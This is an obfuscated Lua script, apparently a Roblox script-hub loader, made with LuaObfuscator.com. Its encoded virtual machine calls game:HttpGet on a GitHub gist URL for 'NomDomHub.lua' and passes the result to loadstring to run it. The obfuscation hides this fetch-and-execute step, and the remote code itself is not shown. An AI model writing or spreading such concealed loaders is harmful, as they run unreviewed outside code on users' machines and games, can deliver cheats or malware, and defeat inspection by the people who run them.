--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v128=v5(v88,v19);v19=nil;return v128;else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-((1 + 1) -(878 -(282 + 595))))) + (620 -(555 + 64)))) ;return v89-(v89%(932 -(857 + 74))) ;else local v90=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v90 + v90))>=v90) and 1) or (0 + 0) ;end end local function v21() local v34=1637 -(1523 + 114) ;local v35;while true do if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + ((1271 -(226 + 1044)) -0) ;v34=1;end if (v34==(1066 -(68 + (4341 -3344)))) then return v35;end end end local function v22() local v36=117 -(32 + 85) ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (3 -(2 -1)) );v18=v18 + (352 -(87 + 263)) ;v36=1 + 0 ;end if (v36==1) then return (v38 * (1213 -(892 + 65))) + v37 ;end end end local function v23() local v39=0 + 0 ;local v40;local v41;local v42;local v43;while true do if ((0 -0)==v39) then v40,v41,v42,v43=v1(v16,v18,v18 + 3 );v18=v18 + (956 -(802 + (424 -274))) ;v39=1;end if (v39==(2 -1)) then return (v43 * (30433252 -(7955270 + 5700766))) + (v42 * (47703 + 17833)) + (v41 * (1253 -(915 + 82))) + v40 ;end end end local function v24() local v44=v23();local v45=v23();local v46=1;local v47=(v20(v45,1 -(1486 -(998 + 488)) ,1207 -(1069 + 118) ) * ((4 -2)^(69 -37))) + v44 ;local v48=v20(v45,4 + 17 ,54 -23 );local v49=((v20(v45,11 + 21 + 0 )==(792 -(368 + 423))) and  -(3 -(2 + 0))) or (19 -(10 + (780 -(201 + 571)))) ;if (v48==(0 -0)) then if (v47==(442 -(416 + 26))) then return v49 * (0 -0) ;else v48=1;v46=0;end elseif (v48==(879 + 1168)) then return ((v47==(0 -0)) and (v49 * ((439 -(145 + (1431 -(116 + 1022))))/((1790 -1360) -(44 + 386))))) or (v49 * NaN) ;end return v8(v49,v48-(601 + 422) ) * (v46 + (v47/(2^52))) ;end local function v25(v50) local v51=0 -(1080 -(1020 + 60)) ;local v52;local v53;while true do if (v51==(10 -7)) then return v6(v53);end if (1==v51) then v52=v3(v16,v18,(v18 + v50) -(860 -(814 + (1468 -(630 + 793)))) );v18=v18 + v50 ;v51=4 -(6 -4) ;end if ((1 + 1)==v51) then v53={};for v117=1, #v52 do v53[v117]=v2(v1(v3(v52,v117,v117)));end v51=2 + 1 ;end if (v51==(885 -(261 + 624))) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=1 -0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v91~= #"}") then else if (v92== #"}") then v93=(function() return v94()~=(0 -0) ;end)();elseif (v92==2) then v93=(function() return v95();end)();elseif (v92== #"19(") then v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if ((651 -(494 + 157))==v91) then local v124=(function() return 0 -0 ;end)();local v125=(function() return;end)();while true do if (v124~=(0 -0)) then else v125=(function() return 0 + 0 ;end)();while true do if (v125==(3 -2)) then v91=(function() return  #"}";end)();break;end if ((0 + 0)==v125) then v92=(function() return v94();end)();v93=(function() return nil;end)();v125=(function() return 1 + 0 ;end)();end end break;end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v55=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 836 -(660 + 176) ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v108~=0) then else local v126=(function() return 0;end)();while true do if (v126==(0 + 0)) then v99=(function() return 202 -(14 + 188) ;end)();v100=(function() return nil;end)();v126=(function() return 676 -(534 + 141) ;end)();end if ((1 + 0)==v126) then v108=(function() return 1 + 0 ;end)();break;end end end if ((1 + 0)~=v108) then else local v127=(function() return 0;end)();while true do if (v127==(0 -0)) then local v129=(function() return 0 -0 ;end)();while true do if (v129~=(0 -0)) then else while true do if (v99==(0 -0)) then v100=(function() return v101();end)();if (v102(v100, #",", #"\\")==(0 + 0)) then local v172=(function() return 0;end)();local v173=(function() return;end)();local v174=(function() return;end)();local v175=(function() return;end)();while true do if (v172==1) then local v176=(function() return 0 + 0 ;end)();while true do if (v176==(0 + 0)) then v175=(function() return {v103(),v103(),nil,nil};end)();if (v173==(0 -0)) then local v181=(function() return 396 -(115 + 281) ;end)();while true do if (v181==0) then v175[ #"19("]=(function() return v103();end)();v175[ #"?id="]=(function() return v103();end)();break;end end elseif (v173== #"!") then v175[ #"-19"]=(function() return v104();end)();elseif (v173==(1 + 1)) then v175[ #"-19"]=(function() return v104() -((4 -2)^(1652 -(1373 + 263))) ;end)();elseif (v173~= #"gha") then else local v186=(function() return 0;end)();while true do if (v186==0) then v175[ #"xxx"]=(function() return v104() -(2^(1016 -(451 + 549))) ;end)();v175[ #"0313"]=(function() return v103();end)();break;end end end v176=(function() return 1;end)();end if (v176==1) then v172=(function() return 2 + 0 ;end)();break;end end end if ((7 -4)==v172) then if (v102(v174, #"91(", #"-19")== #"/") then v175[ #"asd1"]=(function() return v105[v175[ #"xnxx"]];end)();end v106[v107]=(function() return v175;end)();break;end if (v172==0) then v173=(function() return v102(v100,7 -5 , #"19(");end)();v174=(function() return v102(v100, #"0836",6);end)();v172=(function() return 868 -(550 + 317) ;end)();end if (v172~=(2 -0)) then else if (v102(v174, #",", #"\\")== #"|") then v175[1386 -(746 + 638) ]=(function() return v105[v175[1 + 1 ]];end)();end if (v102(v174,2 -0 ,2 -0 )== #"]") then v175[ #"xnx"]=(function() return v105[v175[ #"xxx"]];end)();end v172=(function() return 3 -0 ;end)();end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end end end;end)();local v56=(function() return function(v109,v110,v111) local v112=(function() return 0;end)();local v113=(function() return;end)();while true do if (v112==0) then v113=(function() return 0;end)();while true do if (v113==(1581 -(1535 + 46))) then local v130=(function() return 0 -0 ;end)();while true do if (v130~=(285 -(134 + 151))) then else v109[v110-#"|" ]=(function() return v111();end)();return v109,v110,v111;end end end end break;end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v70= #"<",v61 do FlatIdent_7FAC9,Type,Cons,v21,v24,v25,v62,v70=(function() return v54(FlatIdent_7FAC9,Type,Cons,v21,v24,v25,v62,v70);end)();end v60[ #"nil"]=(function() return v21();end)();for v71= #"]",v23() do FlatIdent_77C29,Descriptor,v21,v20,v22,v23,v62,v57,v71=(function() return v55(FlatIdent_77C29,Descriptor,v21,v20,v22,v23,v62,v57,v71);end)();end for v72= #"[",v23() do v58,v72,v28=(function() return v56(v58,v72,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[1];local v68=v64[(970 -408) -(306 + 254) ];local v69=v64[(3 -2) + 2 ];return function(...) local v73=v67;local v74=v68;local v75=v69;local v76=v27;local v77=1 -0 ;local v78= -(1468 -(899 + 568));local v79={};local v80={...};local v81=v12("#",...) -1 ;local v82={};local v83={};for v114=0 -0 ,v81 do if (v114>=v75) then v79[v114-v75 ]=v80[v114 + (604 -(268 + 335)) ];else v83[v114]=v80[v114 + (291 -(60 + 230)) ];end end local v84=(v81-v75) + 1 ;local v85;local v86;while true do v85=v73[v77];v86=v85[573 -(426 + 146) ];if ((v86<=(1 + 2)) or (3283>=4535)) then if (v86<=((1186 + 271) -(282 + 1174))) then if (v86>(811 -(569 + 242))) then v83[v85[5 -3 ]]=v66[v85[1 + 1 + 1 ]];else local v133=v85[2];local v134,v135=v76(v83[v133](v13(v83,v133 + (1025 -(706 + 318)) ,v85[1254 -((1460 -739) + 530) ])));v78=(v135 + v133) -(1272 -((1010 -(30 + 35)) + 326)) ;local v136=0 -0 ;for v142=v133,v78 do v136=v136 + 1 + 0 ;v83[v142]=v134[v136];end end elseif (v86>(702 -(271 + 429))) then local v137=v85[2 + 0 ];v83[v137]=v83[v137](v13(v83,v137 + 1 ,v78));else v83[v85[1502 -(1408 + 92) ]]=v85[1089 -(461 + 625) ];end elseif (v86<=5) then if ((18<=2112) and (v86==(1292 -(993 + 295)))) then v83[v85[1 + 1 ]]={};else v83[v85[2]]();end elseif (v86<=(1177 -(418 + 753))) then do return;end elseif (v86==7) then local v145=v85[1 + 1 ];local v146=v83[v85[3]];v83[v145 + 1 ]=v146;v83[v145]=v146[v85[1 + 3 + 0 ]];else local v150;local v151,v152;local v153;local v154;v83[v85[2]]={};v77=v77 + 1 + (1257 -(1043 + 214)) ;v85=v73[v77];v83[v85[(3 -2) + 1 ]]=v66[v85[532 -(406 + 123) ]];v77=v77 + (1770 -((2961 -(323 + 889)) + 20)) ;v85=v73[v77];v83[v85[2]]=v66[v85[3]];v77=v77 + 1 ;v85=v73[v77];v154=v85[1 + 1 ];v153=v83[v85[1325 -(1249 + 73) ]];v83[v154 + 1 + (0 -0) ]=v153;v83[v154]=v153[v85[4]];v77=v77 + (1146 -(466 + 679)) ;v85=v73[v77];v83[v85[(584 -(361 + 219)) -2 ]]=v85[8 -(325 -(53 + 267)) ];v77=v77 + ((430 + 1471) -(106 + 1794)) ;v85=v73[v77];v154=v85[1 + 1 ];v151,v152=v76(v83[v154](v13(v83,v154 + 1 + 0 ,v85[8 -5 ])));v78=(v152 + v154) -(2 -1) ;v150=114 -(4 + 110) ;for v169=v154,v78 do v150=v150 + (585 -(57 + 527)) ;v83[v169]=v151[v150];end v77=v77 + (1428 -(41 + 1386)) ;v85=v73[v77];v154=v85[105 -((430 -(15 + 398)) + 86) ];v83[v154]=v83[v154](v13(v83,v154 + 1 + (982 -(18 + 964)) ,v78));v77=v77 + (1 -0) ;v85=v73[v77];v83[v85[5 -3 ]]();v77=v77 + 1 ;v85=v73[v77];do return;end end v77=v77 + (167 -(122 + 44)) ;end end;end return v29(v28(),{},v17)(...);end return v15("ND!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403883Q00682Q7470733A2Q2F676973742E67697468756275736572636F6E74656E742E636F6D2F542Q4475796D352Q302F633964333166636139383930323362373337343836666130642Q6564323436662F7261772F2Q61643463613336333Q6438636239302Q32333961626636663736662Q332Q32303163306538652F4E6F6D446F6D4875622E6C756100094Q00087Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
